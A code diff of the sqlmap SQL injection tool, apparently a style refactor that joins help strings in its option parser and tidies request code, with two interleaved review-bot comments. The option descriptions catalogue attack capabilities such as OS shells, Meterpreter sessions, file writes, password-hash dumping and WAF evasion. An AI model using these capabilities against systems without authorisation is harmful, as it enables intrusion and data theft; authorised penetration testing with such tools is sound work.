@@ -139,62 +135,55 @@ def cmdLineParser(argv=None): help="Extra headers (e.g. \"Accept-Language: fr\\nETag: 123\")") request.add_option("--auth-type", dest="authType", - help="HTTP authentication type " - "(Basic, Digest, NTLM or PKI)") + help="HTTP authentication type (Basic, Digest, NTLM or PKI)") request.add_option("--auth-cred", dest="authCred", - help="HTTP authentication credentials " - "(name:password)") + help="HTTP authentication credentials (name:password)") request.add_option("--auth-file", dest="authFile", help="HTTP authentication PEM cert/private key file") request.add_option("--ignore-code", dest="ignoreCode", type="int", - help="Ignore HTTP error code (e.g. 401)") + help="Ignore HTTP error code (e.g. 401)") request.add_option("--ignore-proxy", dest="ignoreProxy", action="store_true", help="Ignore system default proxy settings") request.add_option("--ignore-redirects", dest="ignoreRedirects", action="store_true", - help="Ignore redirection attempts") + help="Ignore redirection attempts") request.add_option("--ignore-timeouts", dest="ignoreTimeouts", action="store_true", - help="Ignore connection timeouts") + help="Ignore connection timeouts") request.add_option("--proxy", dest="proxy", help="Use a proxy to connect to the target URL") request.add_option("--proxy-cred", dest="proxyCred", - help="Proxy authentication credentials " - "(name:password)") + help="Proxy authentication credentials (name:password)") request.add_option("--proxy-file", dest="proxyFile", help="Load proxy list from a file") - request.add_option("--tor", dest="tor", - action="store_true", - help="Use Tor anonymity network") + request.add_option("--tor", dest="tor", action="store_true", + help="Use Tor anonymity network") request.add_option("--tor-port", dest="torPort", - help="Set Tor proxy port other than default") + help="Set Tor proxy port other than default") request.add_option("--tor-type", dest="torType", - help="Set Tor proxy type (HTTP, SOCKS4 or SOCKS5 (default))") + 
help="Set Tor proxy type (HTTP, SOCKS4 or SOCKS5 (default))") - request.add_option("--check-tor", dest="checkTor", - action="store_true", - help="Check to see if Tor is used properly") + request.add_option("--check-tor", dest="checkTor", action="store_true", + help="Check to see if Tor is used properly") request.add_option("--delay", dest="delay", type="float", help="Delay in seconds between each HTTP request") request.add_option("--timeout", dest="timeout", type="float", - help="Seconds to wait before timeout connection " - "(default %d)" % defaults.timeout) + help="Seconds to wait before timeout connection (default %d)" % defaults.timeout) request.add_option("--retries", dest="retries", type="int", - help="Retries when the connection timeouts " - "(default %d)" % defaults.retries) + help="Retries when the connection timeouts (default %d)" % defaults.retries) request.add_option("--randomize", dest="rParam", help="Randomly change value for given parameter(s)") @@ -211,8 +200,7 @@ def cmdLineParser(argv=None): request.add_option("--safe-freq", dest="safeFreq", type="int", help="Test requests between two visits to a given safe URL") - request.add_option("--skip-urlencode", dest="skipUrlEncode", - action="store_true", + request.add_option("--skip-urlencode", dest="skipUrlEncode", action="store_true", help="Skip URL encoding of payload data") request.add_option("--csrf-token", dest="csrfToken", 
@@ -221,44 +209,36 @@ def cmdLineParser(argv=None): request.add_option("--csrf-url", dest="csrfUrl", help="URL address to visit to extract anti-CSRF token") - request.add_option("--force-ssl", dest="forceSSL", - action="store_true", + request.add_option("--force-ssl", dest="forceSSL", action="store_true", help="Force usage of SSL/HTTPS") - request.add_option("--hpp", dest="hpp", - action="store_true", - help="Use HTTP parameter pollution method") + request.add_option("--hpp", dest="hpp", action="store_true", + help="Use HTTP parameter pollution method") request.add_option("--eval", dest="evalCode", help="Evaluate provided Python code before the request (e.g. \"import hashlib;id2=hashlib.md5(id).hexdigest()\")") # Optimization options - optimization = OptionGroup(parser, "Optimization", "These " - "options can be used to optimize the " - "performance of sqlmap") + optimization = OptionGroup(parser, "Optimization", "These options can be used to optimize the performance of sqlmap") - optimization.add_option("-o", dest="optimize", - action="store_true", - help="Turn on all optimization switches") + optimization.add_option("-o", dest="optimize", action="store_true", + help="Turn on all optimization switches") optimization.add_option("--predict-output", dest="predictOutput", action="store_true", - help="Predict common queries output") + help="Predict common queries output") optimization.add_option("--keep-alive", dest="keepAlive", action="store_true", - help="Use persistent HTTP(s) connections") + help="Use persistent HTTP(s) connections") optimization.add_option("--null-connection", dest="nullConnection", action="store_true", - help="Retrieve page length without actual HTTP response body") + help="Retrieve page length without actual HTTP response body") optimization.add_option("--threads", dest="threads", type="int", - help="Max number of concurrent HTTP(s) " + help="Max number of concurrent HTTP(s) " "requests (default %d)" % defaults.threads) # Injection options - 
injection = OptionGroup(parser, "Injection", "These options can be " - "used to specify which parameters to test " - "for, provide custom injection payloads and " - "optional tampering scripts") + injection = OptionGroup(parser, "Injection", "These options can be used to specify which parameters to test for, provide custom injection payloads and optional tampering scripts") injection.add_option("-p", dest="testParameter", help="Testable parameter(s)") 
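Review bot: The help-string normalization in this hunk stops short of `--threads`, which still carries the split literal `help="Max number of concurrent HTTP(s) " "requests (default %d)" % defaults.threads`; the same leftover appears for `--os-bof` in the `@@ -526` hunk (`"Stored procedure buffer overflow " "exploitation"`). Joining it as `help="Max number of concurrent HTTP(s) requests (default %d)" % defaults.threads` keeps the file in the single-literal style the rest of the commit adopts. cmdLineParser starts and ends outside the hunk.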
@@ -270,36 +250,30 @@ def cmdLineParser(argv=None): help="Skip testing parameters that not appear to be dynamic") injection.add_option("--param-exclude", dest="paramExclude", - help="Regexp to exclude parameters from testing (e.g. \"ses\")") + help="Regexp to exclude parameters from testing (e.g. \"ses\")") injection.add_option("--dbms", dest="dbms", help="Force back-end DBMS to this value") injection.add_option("--dbms-cred", dest="dbmsCred", - help="DBMS authentication credentials (user:password)") + help="DBMS authentication credentials (user:password)") injection.add_option("--os", dest="os", - help="Force back-end DBMS operating system " - "to this value") + help="Force back-end DBMS operating system to this value") - injection.add_option("--invalid-bignum", dest="invalidBignum", - action="store_true", + injection.add_option("--invalid-bignum", dest="invalidBignum", action="store_true", help="Use big numbers for invalidating values") - injection.add_option("--invalid-logical", dest="invalidLogical", - action="store_true", + injection.add_option("--invalid-logical", dest="invalidLogical", action="store_true", help="Use logical operations for invalidating values") - injection.add_option("--invalid-string", dest="invalidString", - action="store_true", + injection.add_option("--invalid-string", dest="invalidString", action="store_true", help="Use random strings for invalidating values") - injection.add_option("--no-cast", dest="noCast", - action="store_true", + injection.add_option("--no-cast", dest="noCast", action="store_true", help="Turn off payload casting mechanism") - injection.add_option("--no-escape", dest="noEscape", - action="store_true", + injection.add_option("--no-escape", dest="noEscape", action="store_true", help="Turn off string escaping mechanism") injection.add_option("--prefix", dest="prefix", 
@@ -312,54 +286,40 @@ def cmdLineParser(argv=None): help="Use given script(s) for tampering injection data") # Detection options - detection = OptionGroup(parser, "Detection", "These options can be " - "used to customize the detection phase") + detection = OptionGroup(parser, "Detection", "These options can be used to customize the detection phase") detection.add_option("--level", dest="level", type="int", - help="Level of tests to perform (1-5, " - "default %d)" % defaults.level) + help="Level of tests to perform (1-5, default %d)" % defaults.level) detection.add_option("--risk", dest="risk", type="int", - help="Risk of tests to perform (1-3, " - "default %d)" % defaults.risk) + help="Risk of tests to perform (1-3, default %d)" % defaults.risk) detection.add_option("--string", dest="string", - help="String to match when " - "query is evaluated to True") + help="String to match when query is evaluated to True") detection.add_option("--not-string", dest="notString", - help="String to match when " - "query is evaluated to False") + help="String to match when query is evaluated to False") detection.add_option("--regexp", dest="regexp", - help="Regexp to match when " - "query is evaluated to True") + help="Regexp to match when query is evaluated to True") detection.add_option("--code", dest="code", type="int", - help="HTTP code to match when " - "query is evaluated to True") + help="HTTP code to match when query is evaluated to True") - detection.add_option("--text-only", dest="textOnly", - action="store_true", + detection.add_option("--text-only", dest="textOnly", action="store_true", help="Compare pages based only on the textual content") - detection.add_option("--titles", dest="titles", - action="store_true", + detection.add_option("--titles", dest="titles", action="store_true", help="Compare pages based only on their titles") # Techniques options - techniques = OptionGroup(parser, "Techniques", "These options can be " - "used to tweak testing of specific SQL " - 
"injection techniques") + techniques = OptionGroup(parser, "Techniques", "These options can be used to tweak testing of specific SQL injection techniques") techniques.add_option("--technique", dest="tech", - help="SQL injection techniques to use " - "(default \"%s\")" % defaults.tech) + help="SQL injection techniques to use (default \"%s\")" % defaults.tech) - techniques.add_option("--time-sec", dest="timeSec", - type="int", - help="Seconds to delay the DBMS response " - "(default %d)" % defaults.timeSec) + techniques.add_option("--time-sec", dest="timeSec", type="int", + help="Seconds to delay the DBMS response (default %d)" % defaults.timeSec) techniques.add_option("--union-cols", dest="uCols", help="Range of columns to test for UNION query SQL injection") 
@@ -374,58 +334,45 @@ def cmdLineParser(argv=None): help="Domain name used for DNS exfiltration attack") techniques.add_option("--second-order", dest="secondOrder", - help="Resulting page URL searched for second-order " - "response") + help="Resulting page URL searched for second-order response") # Fingerprint options fingerprint = OptionGroup(parser, "Fingerprint") - fingerprint.add_option("-f", "--fingerprint", dest="extensiveFp", - action="store_true", + fingerprint.add_option("-f", "--fingerprint", dest="extensiveFp", action="store_true", help="Perform an extensive DBMS version fingerprint") # Enumeration options - enumeration = OptionGroup(parser, "Enumeration", "These options can " - "be used to enumerate the back-end database " - "management system information, structure " - "and data contained in the tables. Moreover " - "you can run your own SQL statements") + enumeration = OptionGroup(parser, "Enumeration", "These options can be used to enumerate the back-end database management system information, structure and data contained in the tables. 
Moreover you can run your own SQL statements") - enumeration.add_option("-a", "--all", dest="getAll", - action="store_true", help="Retrieve everything") + enumeration.add_option("-a", "--all", dest="getAll", action="store_true", + help="Retrieve everything") - enumeration.add_option("-b", "--banner", dest="getBanner", - action="store_true", help="Retrieve DBMS banner") + enumeration.add_option("-b", "--banner", dest="getBanner", action="store_true", + help="Retrieve DBMS banner") - enumeration.add_option("--current-user", dest="getCurrentUser", - action="store_true", + enumeration.add_option("--current-user", dest="getCurrentUser", action="store_true", help="Retrieve DBMS current user") - enumeration.add_option("--current-db", dest="getCurrentDb", - action="store_true", + enumeration.add_option("--current-db", dest="getCurrentDb", action="store_true", help="Retrieve DBMS current database") - enumeration.add_option("--hostname", dest="getHostname", - action="store_true", + enumeration.add_option("--hostname", dest="getHostname", action="store_true", help="Retrieve DBMS server hostname") - enumeration.add_option("--is-dba", dest="isDba", - action="store_true", + enumeration.add_option("--is-dba", dest="isDba", action="store_true", help="Detect if the DBMS current user is DBA") enumeration.add_option("--users", dest="getUsers", action="store_true", help="Enumerate DBMS users") - enumeration.add_option("--passwords", dest="getPasswordHashes", - action="store_true", + enumeration.add_option("--passwords", dest="getPasswordHashes", action="store_true", help="Enumerate DBMS users password hashes") - enumeration.add_option("--privileges", dest="getPrivileges", - action="store_true", + enumeration.add_option("--privileges", dest="getPrivileges", action="store_true", help="Enumerate DBMS users privileges") - enumeration.add_option("--roles", dest="getRoles", - action="store_true", + enumeration.add_option("--roles", dest="getRoles", action="store_true", help="Enumerate DBMS 
users roles") enumeration.add_option("--dbs", dest="getDbs", action="store_true", @@ -470,10 +417,8 @@ def cmdLineParser(argv=None): enumeration.add_option("-U", dest="user", help="DBMS user to enumerate") - enumeration.add_option("--exclude-sysdbs", dest="excludeSysDbs", - action="store_true", - help="Exclude DBMS system databases when " - "enumerating tables") + enumeration.add_option("--exclude-sysdbs", dest="excludeSysDbs", action="store_true", + help="Exclude DBMS system databases when enumerating tables") enumeration.add_option("--pivot-column", dest="pivotColumn", help="Pivot column name") 
@@ -496,28 +441,23 @@ def cmdLineParser(argv=None): enumeration.add_option("--sql-query", dest="query", help="SQL statement to be executed") - enumeration.add_option("--sql-shell", dest="sqlShell", - action="store_true", + enumeration.add_option("--sql-shell", dest="sqlShell", action="store_true", help="Prompt for an interactive SQL shell") enumeration.add_option("--sql-file", dest="sqlFile", help="Execute SQL statements from given file(s)") # Brute force options - brute = OptionGroup(parser, "Brute force", "These " - "options can be used to run brute force " - "checks") + brute = OptionGroup(parser, "Brute force", "These options can be used to run brute force checks") brute.add_option("--common-tables", dest="commonTables", action="store_true", - help="Check existence of common tables") + help="Check existence of common tables") brute.add_option("--common-columns", dest="commonColumns", action="store_true", - help="Check existence of common columns") + help="Check existence of common columns") # User-defined function options - udf = OptionGroup(parser, "User-defined function injection", "These " - "options can be used to create custom user-defined " - "functions") + udf = OptionGroup(parser, "User-defined function injection", "These options can be used to create custom user-defined functions") udf.add_option("--udf-inject", dest="udfInject", action="store_true", help="Inject custom user-defined functions") 
@@ -526,167 +466,131 @@ def cmdLineParser(argv=None): help="Local path of the shared library") # File system options - filesystem = OptionGroup(parser, "File system access", "These options " - "can be used to access the back-end database " - "management system underlying file system") + filesystem = OptionGroup(parser, "File system access", "These options can be used to access the back-end database management system underlying file system") filesystem.add_option("--file-read", dest="rFile", - help="Read a file from the back-end DBMS " - "file system") + help="Read a file from the back-end DBMS file system") filesystem.add_option("--file-write", dest="wFile", - help="Write a local file on the back-end " - "DBMS file system") + help="Write a local file on the back-end DBMS file system") filesystem.add_option("--file-dest", dest="dFile", - help="Back-end DBMS absolute filepath to " - "write to") + help="Back-end DBMS absolute filepath to write to") # Takeover options - takeover = OptionGroup(parser, "Operating system access", "These " - "options can be used to access the back-end " - "database management system underlying " - "operating system") + takeover = OptionGroup(parser, "Operating system access", "These options can be used to access the back-end database management system underlying operating system") takeover.add_option("--os-cmd", dest="osCmd", help="Execute an operating system command") - takeover.add_option("--os-shell", dest="osShell", - action="store_true", - help="Prompt for an interactive operating " - "system shell") + takeover.add_option("--os-shell", dest="osShell", action="store_true", + help="Prompt for an interactive operating system shell") - takeover.add_option("--os-pwn", dest="osPwn", - action="store_true", - help="Prompt for an OOB shell, " - "Meterpreter or VNC") + takeover.add_option("--os-pwn", dest="osPwn", action="store_true", + help="Prompt for an OOB shell, Meterpreter or VNC") - takeover.add_option("--os-smbrelay", dest="osSmb", - 
action="store_true", - help="One click prompt for an OOB shell, " - "Meterpreter or VNC") + takeover.add_option("--os-smbrelay", dest="osSmb", action="store_true", + help="One click prompt for an OOB shell, Meterpreter or VNC") - takeover.add_option("--os-bof", dest="osBof", - action="store_true", + takeover.add_option("--os-bof", dest="osBof", action="store_true", help="Stored procedure buffer overflow " "exploitation") - takeover.add_option("--priv-esc", dest="privEsc", - action="store_true", + takeover.add_option("--priv-esc", dest="privEsc", action="store_true", help="Database process user privilege escalation") takeover.add_option("--msf-path", dest="msfPath", - help="Local path where Metasploit Framework " - "is installed") + help="Local path where Metasploit Framework is installed") takeover.add_option("--tmp-path", dest="tmpPath", - help="Remote absolute path of temporary files " - "directory") + help="Remote absolute path of temporary files directory") # Windows registry options - windows = OptionGroup(parser, "Windows registry access", "These " - "options can be used to access the back-end " - "database management system Windows " - "registry") + windows = OptionGroup(parser, "Windows registry access", "These options can be used to access the back-end database management system Windows registry") - windows.add_option("--reg-read", dest="regRead", - action="store_true", - help="Read a Windows registry key value") + windows.add_option("--reg-read", dest="regRead", action="store_true", + help="Read a Windows registry key value") - windows.add_option("--reg-add", dest="regAdd", - action="store_true", - help="Write a Windows registry key value data") + windows.add_option("--reg-add", dest="regAdd", action="store_true", + help="Write a Windows registry key value data") - windows.add_option("--reg-del", dest="regDel", - action="store_true", - help="Delete a Windows registry key value") + windows.add_option("--reg-del", dest="regDel", action="store_true", + 
help="Delete a Windows registry key value") windows.add_option("--reg-key", dest="regKey", - help="Windows registry key") + help="Windows registry key") windows.add_option("--reg-value", dest="regVal", - help="Windows registry key value") + help="Windows registry key value") windows.add_option("--reg-data", dest="regData", - help="Windows registry key value data") + help="Windows registry key value data") windows.add_option("--reg-type", dest="regType", - help="Windows registry key value type") + help="Windows registry key value type") # General options - general = OptionGroup(parser, "General", "These options can be used " - "to set some general working parameters") + general = OptionGroup(parser, "General", "These options can be used to set some general working parameters") general.add_option("-s", dest="sessionFile", - help="Load session from a stored (.sqlite) file") + help="Load session from a stored (.sqlite) file") general.add_option("-t", dest="trafficFile", - help="Log all HTTP traffic into a " - "textual file") + help="Log all HTTP traffic into a textual file") - general.add_option("--batch", dest="batch", - action="store_true", - help="Never ask for user input, use the default behavior") + general.add_option("--batch", dest="batch", action="store_true", + help="Never ask for user input, use the default behavior") general.add_option("--binary-fields", dest="binaryFields", - help="Result fields having binary values (e.g. \"digest\")") + help="Result fields having binary values (e.g. 
\"digest\")") - general.add_option("--check-internet", dest="checkInternet", - action="store_true", - help="Check Internet connection before assessing the target") + general.add_option("--check-internet", dest="checkInternet", action="store_true", + help="Check Internet connection before assessing the target") general.add_option("--crawl", dest="crawlDepth", type="int", - help="Crawl the website starting from the target URL") + help="Crawl the website starting from the target URL") general.add_option("--crawl-exclude", dest="crawlExclude", help="Regexp to exclude pages from crawling (e.g. \"logout\")") general.add_option("--csv-del", dest="csvDel", - help="Delimiting character used in CSV output " - "(default \"%s\")" % defaults.csvDel) + help="Delimiting character used in CSV output (default \"%s\")" % defaults.csvDel) general.add_option("--charset", dest="charset", help="Blind SQL injection charset (e.g. \"0123456789abcdef\")") general.add_option("--dump-format", dest="dumpFormat", - help="Format of dumped data (CSV (default), HTML or SQLITE)") + help="Format of dumped data (CSV (default), HTML or SQLITE)") general.add_option("--encoding", dest="encoding", - help="Character encoding used for data retrieval (e.g. GBK)") + help="Character encoding used for data retrieval (e.g. 
GBK)") - general.add_option("--eta", dest="eta", - action="store_true", - help="Display for each output the estimated time of arrival") + general.add_option("--eta", dest="eta", action="store_true", + help="Display for each output the estimated time of arrival") - general.add_option("--flush-session", dest="flushSession", - action="store_true", - help="Flush session files for current target") + general.add_option("--flush-session", dest="flushSession", action="store_true", + help="Flush session files for current target") - general.add_option("--forms", dest="forms", - action="store_true", - help="Parse and test forms on target URL") + general.add_option("--forms", dest="forms", action="store_true", + help="Parse and test forms on target URL") - general.add_option("--fresh-queries", dest="freshQueries", - action="store_true", - help="Ignore query results stored in session file") + general.add_option("--fresh-queries", dest="freshQueries", action="store_true", + help="Ignore query results stored in session file") general.add_option("--har", dest="harFile", help="Log all HTTP traffic into a HAR file") - general.add_option("--hex", dest="hexConvert", - action="store_true", - help="Use DBMS hex function(s) for data retrieval") + general.add_option("--hex", dest="hexConvert", action="store_true", + help="Use DBMS hex function(s) for data retrieval") - general.add_option("--output-dir", dest="outputDir", - action="store", - help="Custom output directory path") + general.add_option("--output-dir", dest="outputDir", action="store", + help="Custom output directory path") - general.add_option("--parse-errors", dest="parseErrors", - action="store_true", - help="Parse and display DBMS error messages from responses") + general.add_option("--parse-errors", dest="parseErrors", action="store_true", + help="Parse and display DBMS error messages from responses") general.add_option("--save", dest="saveConfig", - help="Save options to a configuration INI file") + help="Save options to 
a configuration INI file") general.add_option("--scope", dest="scope", help="Regexp to filter targets from provided proxy log") 
@@ -697,77 +601,65 @@ def cmdLineParser(argv=None): general.add_option("--test-skip", dest="testSkip", help="Skip tests by payloads and/or titles (e.g. BENCHMARK)") - general.add_option("--update", dest="updateAll", - action="store_true", - help="Update sqlmap") + general.add_option("--update", dest="updateAll", action="store_true", + help="Update sqlmap") # Miscellaneous options miscellaneous = OptionGroup(parser, "Miscellaneous") miscellaneous.add_option("-z", dest="mnemonics", - help="Use short mnemonics (e.g. \"flu,bat,ban,tec=EU\")") + help="Use short mnemonics (e.g. \"flu,bat,ban,tec=EU\")") miscellaneous.add_option("--alert", dest="alert", - help="Run host OS command(s) when SQL injection is found") + help="Run host OS command(s) when SQL injection is found") miscellaneous.add_option("--answers", dest="answers", - help="Set question answers (e.g. \"quit=N,follow=N\")") + help="Set question answers (e.g. \"quit=N,follow=N\")") miscellaneous.add_option("--beep", dest="beep", action="store_true", - help="Beep on question and/or when SQL injection is found") + help="Beep on question and/or when SQL injection is found") - miscellaneous.add_option("--cleanup", dest="cleanup", - action="store_true", - help="Clean up the DBMS from sqlmap specific " - "UDF and tables") + miscellaneous.add_option("--cleanup", dest="cleanup", action="store_true", + help="Clean up the DBMS from sqlmap specific UDF and tables") - miscellaneous.add_option("--dependencies", dest="dependencies", - action="store_true", - help="Check for missing (non-core) sqlmap dependencies") + miscellaneous.add_option("--dependencies", dest="dependencies", action="store_true", + help="Check for missing (non-core) sqlmap dependencies") - miscellaneous.add_option("--disable-coloring", dest="disableColoring", - action="store_true", - help="Disable console output coloring") + miscellaneous.add_option("--disable-coloring", dest="disableColoring", action="store_true", + help="Disable console output coloring") 
miscellaneous.add_option("--gpage", dest="googlePage", type="int", - help="Use Google dork results from specified page number") + help="Use Google dork results from specified page number") - miscellaneous.add_option("--identify-waf", dest="identifyWaf", - action="store_true", - help="Make a thorough testing for a WAF/IPS/IDS protection") + miscellaneous.add_option("--identify-waf", dest="identifyWaf", action="store_true", + help="Make a thorough testing for a WAF/IPS/IDS protection") - miscellaneous.add_option("--mobile", dest="mobile", - action="store_true", - help="Imitate smartphone through HTTP User-Agent header") + miscellaneous.add_option("--mobile", dest="mobile", action="store_true", + help="Imitate smartphone through HTTP User-Agent header") - miscellaneous.add_option("--offline", dest="offline", - action="store_true", - help="Work in offline mode (only use session data)") + miscellaneous.add_option("--offline", dest="offline", action="store_true", + help="Work in offline mode (only use session data)") - miscellaneous.add_option("--purge-output", dest="purgeOutput", - action="store_true", - help="Safely remove all content from output directory") + miscellaneous.add_option("--purge-output", dest="purgeOutput", action="store_true", + help="Safely remove all content from output directory") - miscellaneous.add_option("--skip-waf", dest="skipWaf", - action="store_true", - help="Skip heuristic detection of WAF/IPS/IDS protection") + miscellaneous.add_option("--skip-waf", dest="skipWaf", action="store_true", + help="Skip heuristic detection of WAF/IPS/IDS protection") - miscellaneous.add_option("--smart", dest="smart", - action="store_true", - help="Conduct thorough tests only if positive heuristic(s)") + miscellaneous.add_option("--smart", dest="smart", action="store_true", + help="Conduct thorough tests only if positive heuristic(s)") miscellaneous.add_option("--sqlmap-shell", dest="sqlmapShell", action="store_true", - help="Prompt for an interactive sqlmap 
shell") + help="Prompt for an interactive sqlmap shell") miscellaneous.add_option("--tmp-dir", dest="tmpDir", - help="Local directory for storing temporary files") + help="Local directory for storing temporary files") miscellaneous.add_option("--web-root", dest="webRoot", - help="Web server document root directory (e.g. \"/var/www\")") + help="Web server document root directory (e.g. \"/var/www\")") - miscellaneous.add_option("--wizard", dest="wizard", - action="store_true", - help="Simple wizard interface for beginner users") + miscellaneous.add_option("--wizard", dest="wizard", action="store_true", + help="Simple wizard interface for beginner users") # Hidden and/or experimental options parser.add_option("--dummy", dest="dummy", action="store_true", @@ -976,9 +868,7 @@ def _(self, *args): if args.dummy: args.url = args.url or DUMMY_URL - if not any((args.direct, args.url, args.logFile, args.bulkFile, args.googleDork, args.configFile, \ - args.requestFile, args.updateAll, args.smokeTest, args.liveTest, args.wizard, args.dependencies, \ - args.purgeOutput, args.sitemapUrl)): + if not any((args.direct, args.url, args.logFile, args.bulkFile, args.googleDork, args.configFile, args.requestFile, args.updateAll, args.smokeTest, args.liveTest, args.wizard, args.dependencies, args.purgeOutput, args.sitemapUrl)): errMsg = "missing a mandatory option (-d, -u, -l, -m, -r, -g, -c, -x, --wizard, --update, --purge-output or --dependencies), " errMsg += "use -h for basic or -hh for advanced help\n" parser.error(errMsg) diff --git a/lib/parse/headers.py b/lib/parse/headers.py index 58accf9a8b9..83cd7e89065 100644 --- a/lib/parse/headers.py +++ b/lib/parse/headers.py 
@@ -24,18 +24,16 @@ def headersParser(headers):
 if not kb.headerPaths:
 kb.headerPaths = {
 "microsoftsharepointteamservices": os.path.join(paths.SQLMAP_XML_BANNER_PATH, "sharepoint.xml"),
- "server": os.path.join(paths.SQLMAP_XML_BANNER_PATH, "server.xml"),
- "servlet-engine": os.path.join(paths.SQLMAP_XML_BANNER_PATH, "servlet-engine.xml"),
- "set-cookie": os.path.join(paths.SQLMAP_XML_BANNER_PATH, "set-cookie.xml"),
- "x-aspnet-version": os.path.join(paths.SQLMAP_XML_BANNER_PATH, "x-aspnet-version.xml"),
- "x-powered-by": os.path.join(paths.SQLMAP_XML_BANNER_PATH, "x-powered-by.xml"),
+ "server": os.path.join(paths.SQLMAP_XML_BANNER_PATH, "server.xml"),
+ "servlet-engine": os.path.join(paths.SQLMAP_XML_BANNER_PATH, "servlet-engine.xml"),
+ "set-cookie": os.path.join(paths.SQLMAP_XML_BANNER_PATH, "set-cookie.xml"),
+ "x-aspnet-version": os.path.join(paths.SQLMAP_XML_BANNER_PATH, "x-aspnet-version.xml"),
+ "x-powered-by": os.path.join(paths.SQLMAP_XML_BANNER_PATH, "x-powered-by.xml"),
 }
 for header in itertools.ifilter(lambda x: x in kb.headerPaths, headers):
 value = headers[header]
 xmlfile = kb.headerPaths[header]
-
 handler = FingerprintHandler(value, kb.headersFp)
-
 parseXmlFile(xmlfile, handler)
 parseXmlFile(paths.GENERIC_XML, handler)
diff --git a/lib/request/basic.py b/lib/request/basic.py
index d0d6d0bbb7c..14e461946ae 100644
--- a/lib/request/basic.py
+++ b/lib/request/basic.py
@@ -110,7 +110,9 @@ def title(self): kb.mergeCookies = readInput(message, default='Y', boolean=True) if kb.mergeCookies and kb.injection.place != PLACE.COOKIE: - _ = lambda x: re.sub(r"(?i)\b%s=[^%s]+" % (re.escape(getUnicode(cookie.name)), conf.cookieDel or DEFAULT_COOKIE_DELIMITER), ("%s=%s" % (getUnicode(cookie.name), getUnicode(cookie.value))).replace('\\', r'\\'), x) + def _(value): + return re.sub(r"(?i)\b%s=[^%s]+" % (re.escape(getUnicode(cookie.name)), conf.cookieDel or DEFAULT_COOKIE_DELIMITER), ("%s=%s" % (getUnicode(cookie.name), getUnicode(cookie.value))).replace('\\', r'\\'), value) + headers[HTTP_HEADER.COOKIE] = _(headers[HTTP_HEADER.COOKIE]) if PLACE.COOKIE in conf.parameters: @@ -161,7 +163,7 @@ def checkCharEncoding(encoding, warn=True): return encoding # Reference: http://www.destructor.de/charsets/index.htm - translate = {"windows-874": "iso-8859-11", "utf-8859-1": "utf8", "en_us": "utf8", "macintosh": "iso-8859-1", "euc_tw": "big5_tw", "th": "tis-620", "unicode": "utf8", "utc8": "utf8", "ebcdic": "ebcdic-cp-be", "iso-8859": "iso8859-1", "iso-8859-0": "iso8859-1", "ansi": "ascii", "gbk2312": "gbk", "windows-31j": "cp932", "en": "us"} + translate = {"windows-874": "iso-8859-11", "utf-8859-1": "utf8", "en_us": "utf8", "macintosh": "iso-8859-1", "euc_tw": "big5_tw", "th": "tis-620", "unicode": "utf8", "utc8": "utf8", "ebcdic": "ebcdic-cp-be", "iso-8859": "iso8859-1", "iso-8859-0": "iso8859-1", "ansi": "ascii", "gbk2312": "gbk", "windows-31j": "cp932", "en": "us"} for delimiter in (';', ',', '('): if delimiter in encoding: diff --git a/lib/request/connect.py b/lib/request/connect.py index 2825c18b4c7..e0ea2a5322d 100644 --- a/lib/request/connect.py +++ b/lib/request/connect.py 
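Review bot: The cookie delimiter is interpolated unescaped into the `[^%s]+` character class, so a `conf.cookieDel` value such as `]` or `\` turns the pattern into a regex compile error (or a different class), while only the cookie name goes through `re.escape`; the new `def _` keeps that as it was. Escaping the second operand too, `re.escape(conf.cookieDel or DEFAULT_COOKIE_DELIMITER)`, keeps the class literal for any delimiter. The enclosing function starts before the hunk and continues after it.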
@@ -187,8 +187,7 @@ def _connReadProxy(conn): if not kb.dnsMode and conn: headers = conn.info() - if headers and hasattr(headers, "getheader") and (headers.getheader(HTTP_HEADER.CONTENT_ENCODING, "").lower() in ("gzip", "deflate")\ - or "text" not in headers.getheader(HTTP_HEADER.CONTENT_TYPE, "").lower()): + if headers and hasattr(headers, "getheader") and (headers.getheader(HTTP_HEADER.CONTENT_ENCODING, "").lower() in ("gzip", "deflate") or "text" not in headers.getheader(HTTP_HEADER.CONTENT_TYPE, "").lower()): retVal = conn.read(MAX_CONNECTION_TOTAL_SIZE) if len(retVal) == MAX_CONNECTION_TOTAL_SIZE: warnMsg = "large compressed response detected. Disabling compression" 
@@ -241,27 +240,27 @@ def getPage(**kwargs): kb.requestCounter += 1 threadData.lastRequestUID = kb.requestCounter - url = kwargs.get("url", None) or conf.url - get = kwargs.get("get", None) - post = kwargs.get("post", None) - method = kwargs.get("method", None) - cookie = kwargs.get("cookie", None) - ua = kwargs.get("ua", None) or conf.agent - referer = kwargs.get("referer", None) or conf.referer - host = kwargs.get("host", None) or conf.host - direct_ = kwargs.get("direct", False) - multipart = kwargs.get("multipart", None) - silent = kwargs.get("silent", False) - raise404 = kwargs.get("raise404", True) - timeout = kwargs.get("timeout", None) or conf.timeout - auxHeaders = kwargs.get("auxHeaders", None) - response = kwargs.get("response", False) + url = kwargs.get("url", None) or conf.url + get = kwargs.get("get", None) + post = kwargs.get("post", None) + method = kwargs.get("method", None) + cookie = kwargs.get("cookie", None) + ua = kwargs.get("ua", None) or conf.agent + referer = kwargs.get("referer", None) or conf.referer + host = kwargs.get("host", None) or conf.host + direct_ = kwargs.get("direct", False) + multipart = kwargs.get("multipart", None) + silent = kwargs.get("silent", False) + raise404 = kwargs.get("raise404", True) + timeout = kwargs.get("timeout", None) or conf.timeout + auxHeaders = kwargs.get("auxHeaders", None) + response = kwargs.get("response", False) ignoreTimeout = kwargs.get("ignoreTimeout", False) or kb.ignoreTimeout or conf.ignoreTimeouts - refreshing = kwargs.get("refreshing", False) - retrying = kwargs.get("retrying", False) - crawling = kwargs.get("crawling", False) - checking = kwargs.get("checking", False) - skipRead = kwargs.get("skipRead", False) + refreshing = kwargs.get("refreshing", False) + retrying = kwargs.get("retrying", False) + crawling = kwargs.get("crawling", False) + checking = kwargs.get("checking", False) + skipRead = kwargs.get("skipRead", False) if multipart: post = multipart 
